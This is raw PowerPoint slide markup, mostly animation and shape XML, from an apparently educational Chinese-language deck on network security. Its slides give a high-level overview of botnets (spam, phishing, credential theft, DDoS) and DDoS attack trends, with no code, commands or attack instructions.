                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6172"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="11" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6171"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6171"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6178"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="617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6152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6152"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="24" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6151"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="61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153"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6153"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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6154"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="615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6170"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6170"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="42" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="43" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6176"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6176"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6175"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6177"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6177"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="54" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6193"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="6152" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="6153" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="6170" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="6175" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="6176" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="6177" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="6193" grpId="0" bldLvl="0" animBg="1"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416C4ED8-7AC9-4D6A-8F50-5F1DB635D47F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Botnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186371" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF134F08-5ACB-412C-9D6A-972662A9CC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>僵尸网络是当前互联网的首要威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>发送垃圾邮件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>网络钓鱼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>盗取帐号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>密码机密信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>发动拒绝服务攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>--DDOS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>僵尸网络正在改变网络经济犯罪</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>经济利益的驱动</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>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394" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F239EA6-33E5-42FC-8F84-6B37957BCBC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DDoS攻击发展趋势</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="187395" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{557D536D-138F-471B-A94D-0ABAEC0E3F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="209550" y="1571625"/>
            <a:ext cx="4219575" cy="3886200"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4220308" cy="3886200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187397" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9E402A-0BB2-4F3C-A61F-8EC3767F6E0A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="504093" y="546100"/>
              <a:ext cx="3259015" cy="2794000"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="F1D8D3"/>
                </a:gs>
                <a:gs pos="71999">
                  <a:srgbClr val="D7907D"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="D47760"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="10000">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:miter lim="800000"/>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solidFill>
                  <a:srgbClr val="000000"/>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87398" name="Oval 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0AC6E31-01F9-4287-8201-49D6C16F04FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="2743200"/>
              <a:ext cx="996462" cy="1054100"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="F1D8D3"/>
                </a:gs>
                <a:gs pos="71999">
                  <a:srgbClr val="D7907D"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="D47760"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="10000">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:round/>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Font typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="333333"/>
                  </a:solidFill>
                  <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>行为特征</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187399" name="Oval 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F37CC52-8E09-4C7F-B2B0-AF987056622F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3223846" y="2832100"/>
              <a:ext cx="996462" cy="1054100"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="F1D8D3"/>
                </a:gs>
                <a:gs pos="71999">
                  <a:srgbClr val="D7907D"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="D47760"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="10000">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:round/>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Font typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="333333"/>
                  </a:solidFill>
                  <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>攻击规模</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187400" name="Oval 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E65D2F2-B1D2-46AB-840C-444D87909F9B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1617785" y="0"/>
              <a:ext cx="996462" cy="1054100"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="F1D8D3"/>
                </a:gs>
                <a:gs pos="71999">
                  <a:srgbClr val="D7907D"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="D47760"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="10000">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:round/>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ClrTx/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="333333"/>
                  </a:solidFill>
                  <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>承载协议</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187396" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03BA9A78-E34D-49C9-A7AA-E2D8D51D90A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4830763" y="1430338"/>
            <a:ext cx="3930650" cy="5216525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="D9D9D9"/>
              </a:gs>
              <a:gs pos="71999">
                <a:srgbClr val="898989"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="6D6D6D"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="10000">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="174625" indent="-174625">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目标</a:t>
            </a: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网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-〉</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网络基础设施（路由器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</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交换机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/DNS</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等）</a:t>
            </a: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流量</a:t>
            </a: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从几兆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-〉</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几十兆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
